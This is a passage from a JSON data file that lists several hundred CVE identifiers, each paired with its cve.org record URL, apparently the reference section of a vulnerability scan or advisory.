"url": "https://www.cve.org/CVERecord?id=CVE-2025-31672"
},
{
"name": "CVE-2025-21681",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21681"
},
{
"name": "CVE-2023-22045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22045"
},
{
"name": "CVE-2025-38540",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38540"
},
{
"name": "CVE-2025-5916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5916"
},
{
"name": "CVE-2025-21676",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21676"
},
{
"name": "CVE-2025-30721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30721"
},
{
"name": "CVE-2025-38403",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38403"
},
{
"name": "CVE-2022-28463",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28463"
},
{
"name": "CVE-2022-23308",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23308"
},
{
"name": "CVE-2025-21726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21726"
},
{
"name": "CVE-2023-29400",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29400"
},
{
"name": "CVE-2025-58056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
},
{
"name": "CVE-2025-22871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
},
{
"name": "CVE-2018-3779",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-3779"
},
{
"name": "CVE-2024-21138",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21138"
},
{
"name": "CVE-2020-28196",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28196"
},
{
"name": "CVE-2024-27407",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27407"
},
{
"name": "CVE-2025-41232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41232"
},
{
"name": "CVE-2024-58020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58020"
},
{
"name": "CVE-2025-50091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50091"
},
{
"name": "CVE-2025-10911",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-10911"
},
{
"name": "CVE-2025-32988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32988"
},
{
"name": "CVE-2021-31566",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-31566"
},
{
"name": "CVE-2024-10963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10963"
},
{
"name": "CVE-2022-28805",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28805"
},
{
"name": "CVE-2024-26461",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26461"
},
{
"name": "CVE-2024-34750",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34750"
},
{
"name": "CVE-2021-29923",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-29923"
},
{
"name": "CVE-2017-3604",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3604"
},
{
"name": "CVE-2025-21723",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21723"
},
{
"name": "CVE-2023-0804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0804"
},
{
"name": "CVE-2023-22049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22049"
},
{
"name": "CVE-2024-24787",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24787"
},
{
"name": "CVE-2025-21802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21802"
},
{
"name": "CVE-2022-21341",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21341"
},
{
"name": "CVE-2025-38146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38146"
},
{
"name": "CVE-2025-21705",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21705"
},
{
"name": "CVE-2024-38828",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38828"
},
{
"name": "CVE-2023-27538",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27538"
},
{
"name": "CVE-2022-1355",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1355"
},
{
"name": "CVE-2025-47291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47291"
},
{
"name": "CVE-2023-4641",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4641"
},
{
"name": "CVE-2025-27113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27113"
},
{
"name": "CVE-2024-47081",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47081"
},
{
"name": "CVE-2023-36054",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36054"
},
{
"name": "CVE-2024-26458",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26458"
},
{
"name": "CVE-2025-38418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38418"
},
{
"name": "CVE-2025-38090",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38090"
},
{
"name": "CVE-2025-21721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21721"
},
{
"name": "CVE-2025-21810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21810"
},
{
"name": "CVE-2022-1420",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1420"
},
{
"name": "CVE-2022-23218",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23218"
},
{
"name": "CVE-2021-24031",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-24031"
},
{
"name": "CVE-2025-23166",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23166"
},
{
"name": "CVE-2022-41724",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41724"
},
{
"name": "CVE-2025-46153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46153"
},
{
"name": "CVE-2025-21877",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21877"
},
{
"name": "CVE-2023-0797",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0797"
},
{
"name": "CVE-2025-5994",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5994"
},
{
"name": "CVE-2021-38115",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38115"
},
{
"name": "CVE-2025-38415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38415"
},
{
"name": "CVE-2021-31879",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-31879"
},
{
"name": "CVE-2024-55549",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55549"
},
{
"name": "CVE-2020-8908",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-8908"
},
{
"name": "CVE-2024-49887",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49887"
},
{
"name": "CVE-2025-22134",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22134"
},
{
"name": "CVE-2021-35578",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35578"
},
{
"name": "CVE-2025-1215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1215"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2023-1916",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1916"
},
{
"name": "CVE-2021-20309",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20309"
},
{
"name": "CVE-2022-29217",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29217"
},
{
"name": "CVE-2024-0397",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0397"
},
{
"name": "CVE-2022-30634",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30634"
},
{
"name": "CVE-2023-38472",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38472"
},
{
"name": "CVE-2024-56826",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56826"
},
{
"name": "CVE-2017-12643",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-12643"
},
{
"name": "CVE-2024-57953",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57953"
},
{
"name": "CVE-2020-14583",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14583"
},
{
"name": "CVE-2025-24294",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24294"
},
{
"name": "CVE-2023-48232",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48232"
},
{
"name": "CVE-2021-26720",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26720"
},
{
"name": "CVE-2025-54801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54801"
},
{
"name": "CVE-2025-40909",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40909"
},
{
"name": "CVE-2025-53054",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53054"
},
{
"name": "CVE-2025-21878",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21878"
},
{
"name": "CVE-2023-24756",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24756"
},
{
"name": "CVE-2017-3607",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3607"
},
{
"name": "CVE-2021-44716",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44716"
},
{
"name": "CVE-2022-2520",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2520"
},
{
"name": "CVE-2022-21340",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21340"
},
{
"name": "CVE-2024-47874",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47874"
},
{
"name": "CVE-2025-21670",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21670"
},
{
"name": "CVE-2025-9403",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9403"
},
{
"name": "CVE-2023-1255",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1255"
},
{
"name": "CVE-2025-21739",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21739"
},
{
"name": "CVE-2016-4074",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-4074"
},
{
"name": "CVE-2024-0746",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0746"
},
{
"name": "CVE-2025-21775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21775"
},
{
"name": "CVE-2024-12254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12254"
},
{
"name": "CVE-2025-21846",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21846"
},
{
"name": "CVE-2022-33099",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-33099"
},
{
"name": "CVE-2023-45931",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45931"
},
{
"name": "CVE-2025-8114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8114"
},
{
"name": "CVE-2025-38400",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38400"
},
{
"name": "CVE-2023-6004",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6004"
},
{
"name": "CVE-2025-32387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32387"
},
{
"name": "CVE-2024-26775",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26775"
},
{
"name": "CVE-2022-25309",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25309"
},
{
"name": "CVE-2025-4516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
},
{
"name": "CVE-2025-38136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38136"
},
{
"name": "CVE-2024-38808",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38808"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2024-12747",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12747"
},
{
"name": "CVE-2022-3358",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3358"
},
{
"name": "CVE-2023-41175",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-41175"
},
{
"name": "CVE-2023-48234",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48234"
},
{
"name": "CVE-2025-55212",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55212"
},
{
"name": "CVE-2022-36087",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36087"
},
{
"name": "CVE-2022-32547",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32547"
},
{
"name": "CVE-2025-6021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6021"
},
{
"name": "CVE-2022-0351",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0351"
},
{
"name": "CVE-2022-35737",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-35737"
},
{
"name": "CVE-2022-21293",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21293"
},
{
"name": "CVE-2022-2097",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2097"
},
{
"name": "CVE-2022-26280",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26280"
},
{
"name": "CVE-2025-37752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37752"
},
{
"name": "CVE-2025-55668",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55668"
},
{
"name": "CVE-2023-7008",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-7008"
},
{
"name": "CVE-2022-1354",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1354"
},
{
"name": "CVE-2023-24540",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24540"
},
{
"name": "CVE-2025-21873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21873"
},
{
"name": "CVE-2024-4603",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4603"
},
{
"name": "CVE-2025-38048",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38048"
},
{
"name": "CVE-2019-13147",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-13147"
},
{
"name": "CVE-2025-50104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50104"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2020-2800",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2800"
},
{
"name": "CVE-2024-8096",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8096"
},
{
"name": "CVE-2018-11655",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11655"
},
{
"name": "CVE-2022-4415",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4415"
},
{
"name": "CVE-2022-2928",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2928"
},
{
"name": "CVE-2025-21765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21765"
},
{
"name": "CVE-2023-3576",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3576"
},
{
"name": "CVE-2025-38477",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38477"
},
{
"name": "CVE-2023-4806",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4806"
},
{
"name": "CVE-2025-61772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61772"
},
{
"name": "CVE-2025-57803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57803"
},
{
"name": "CVE-2023-46246",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46246"
},
{
"name": "CVE-2025-21782",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21782"
},
{
"name": "CVE-2023-31437",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31437"
},
{
"name": "CVE-2023-47039",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47039"
},
{
"name": "CVE-2025-30722",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30722"
},
{
"name": "CVE-2024-43802",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43802"
},
{
"name": "CVE-2025-38177",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38177"
},
{
"name": "CVE-2016-2781",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-2781"
},
{
"name": "CVE-2023-31484",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31484"
},
{
"name": "CVE-2024-56827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56827"
},
{
"name": "CVE-2023-29383",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29383"
},
{
"name": "CVE-2024-21145",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21145"
},
{
"name": "CVE-2022-32206",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32206"
},
{
"name": "CVE-2023-37769",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37769"
},
{
"name": "CVE-2025-21926",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21926"
},
{
"name": "CVE-2022-21282",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21282"
},
{
"name": "CVE-2022-21349",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21349"
},
{
"name": "CVE-2020-29511",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29511"
},
{
"name": "CVE-2024-50602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50602"
},
{
"name": "CVE-2015-7697",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7697"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2025-21742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21742"
},
{
"name": "CVE-2025-30687",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30687"
},
{
"name": "CVE-2023-21968",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21968"
},
{
"name": "CVE-2022-43243",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43243"
},
{
"name": "CVE-2024-58002",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58002"
},
{
"name": "CVE-2017-16231",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-16231"
},
{
"name": "CVE-2025-38406",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38406"
},
{
"name": "CVE-2025-50101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50101"
},
{
"name": "CVE-2025-21930",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21930"
},
{
"name": "CVE-2021-35942",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35942"
},
{
"name": "CVE-2025-46701",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46701"
},
{
"name": "CVE-2025-38001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38001"
},
{
"name": "CVE-2025-32415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32415"
},
{
"name": "CVE-2025-24855",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24855"
},
{
"name": "CVE-2025-5702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5702"
},
{
"name": "CVE-2025-21870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21870"
},
{
"name": "CVE-2017-9409",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-9409"
},
{
"name": "CVE-2023-24537",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24537"
},
{
"name": "CVE-2018-1000077",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000077"
},
{
"name": "CVE-2025-21892",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21892"
},
{
"name": "CVE-2024-58052",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58052"
},
{
"name": "CVE-2025-21944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21944"
},
{
"name": "CVE-2025-21905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21905"
},
{
"name": "CVE-2024-30171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
},
{
"name": "CVE-2024-23337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23337"
},
{
"name": "CVE-2016-0689",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0689"
},
{
"name": "CVE-2025-38352",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38352"
},
{
"name": "CVE-2025-30749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
},
{
"name": "CVE-2024-54456",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54456"
},
{
"name": "CVE-2025-61748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61748"
},
{
"name": "CVE-2025-21920",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21920"
},
{
"name": "CVE-2025-55554",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55554"
},
{
"name": "CVE-2024-43168",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43168"
},
{
"name": "CVE-2014-8140",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-8140"
},
{
"name": "CVE-2025-22235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22235"
},
{
"name": "CVE-2025-22016",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22016"
},
{
"name": "CVE-2025-4207",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4207"
},
{
"name": "CVE-2021-45346",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45346"
},
{
"name": "CVE-2025-37756",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37756"
},
{
"name": "CVE-2022-0908",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0908"
},
{
"name": "CVE-2025-38263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38263"
},
{
"name": "CVE-2025-21667",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21667"
},
{
"name": "CVE-2025-9230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
},
{
"name": "CVE-2024-46901",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46901"
},
{
"name": "CVE-2023-49083",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-49083"
},
{
"name": "CVE-2025-21955",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21955"
},
{
"name": "CVE-2025-8677",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8677"
},
{
"name": "CVE-2025-21773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21773"
},
{
"name": "CVE-2025-53040",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53040"
},
{
"name": "CVE-2025-38218",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38218"
},
{
"name": "CVE-2023-45287",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45287"
},
{
"name": "CVE-2025-53906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53906"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2025-1352",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1352"
},
{
"name": "CVE-2024-43167",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43167"
},
{
"name": "CVE-2021-28861",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-28861"
},
{
"name": "CVE-2024-4741",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4741"
},
{
"name": "CVE-2022-21248",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21248"
},
{
"name": "CVE-2021-33574",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33574"
},
{
"name": "CVE-2018-1000035",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000035"
},
{
"name": "CVE-2021-40211",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-40211"
},
{
"name": "CVE-2025-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
},
{
"name": "CVE-2024-58001",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58001"
},
{
"name": "CVE-2025-38393",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38393"
},
{
"name": "CVE-2024-26256",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26256"
},
{
"name": "CVE-2023-21930",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21930"
},
{
"name": "CVE-2019-18276",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-18276"
},
{
"name": "CVE-2025-38618",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38618"
},
{
"name": "CVE-2021-3326",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3326"
},
{
"name": "CVE-2023-2283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2283"
},
{
"name": "CVE-2020-0499",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-0499"
},
{
"name": "CVE-2025-8916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8916"
},
{
"name": "CVE-2025-21724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21724"
},
{
"name": "CVE-2025-32414",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32414"
},
{
"name": "CVE-2025-8885",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8885"
},
{
"name": "CVE-2025-3136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3136"
},
{
"name": "CVE-2025-55160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55160"
},
{
"name": "CVE-2025-21891",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21891"
},
{
"name": "CVE-2025-38249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38249"
},
{
"name": "CVE-2023-40403",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40403"
},
{
"name": "CVE-2025-22013",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22013"
},
{
"name": "CVE-2024-50157",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50157"
},
{
"name": "CVE-2022-48703",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48703"
},
{
"name": "CVE-2025-38154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38154"
},
{
"name": "CVE-2022-1674",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1674"
},
{
"name": "CVE-2024-20918",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20918"
},
{
"name": "CVE-2025-21858",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21858"
},
{
"name": "CVE-2025-41249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41249"
},
{
"name": "CVE-2022-30699",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30699"
},
{
"name": "CVE-2025-21672",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21672"
},
{
"name": "CVE-2025-38389",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38389"
},
{
"name": "CVE-2025-38448",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38448"
},
{
"name": "CVE-2022-48281",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48281"
},
{
"name": "CVE-2023-2426",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2426"
},
{
"name": "CVE-2021-35938",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35938"
},
{
"name": "CVE-2025-30704",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30704"
},
{
"name": "CVE-2021-35564",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35564"
},
{
"name": "CVE-2024-57949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57949"
},
{
"name": "CVE-2025-1632",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1632"
},
{
"name": "CVE-2021-20176",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20176"
},
{
"name": "CVE-2025-21979",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21979"
},
{
"name": "CVE-2022-3278",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3278"
},
{
"name": "CVE-2022-30580",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30580"
},
{
"name": "CVE-2025-21821",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21821"
},
{
"name": "CVE-2022-28321",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28321"
},
{
"name": "CVE-2025-55298",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55298"
},
{
"name": "CVE-2022-43241",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43241"
},
{
"name": "CVE-2017-3606",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3606"
},
{
"name": "CVE-2023-52969",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52969"
},
{
"name": "CVE-2018-1000073",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000073"
},
{
"name": "CVE-2025-38052",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38052"
},
{
"name": "CVE-2025-38377",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38377"
},
{
"name": "CVE-2023-20883",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-20883"
},
{
"name": "CVE-2025-21733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21733"
},
{
"name": "CVE-2023-22656",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22656"
},
{
"name": "CVE-2025-46551",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46551"
},
{
"name": "CVE-2025-43965",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43965"
},
{
"name": "CVE-2022-40090",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40090"
},
{
"name": "CVE-2021-36408",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36408"
},
{
"name": "CVE-2023-24329",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24329"
},
{
"name": "CVE-2025-21963",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21963"
},
{
"name": "CVE-2025-53045",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53045"
},
{
"name": "CVE-2023-39327",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39327"
},
{
"name": "CVE-2017-18253",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-18253"
},
{
"name": "CVE-2024-12243",
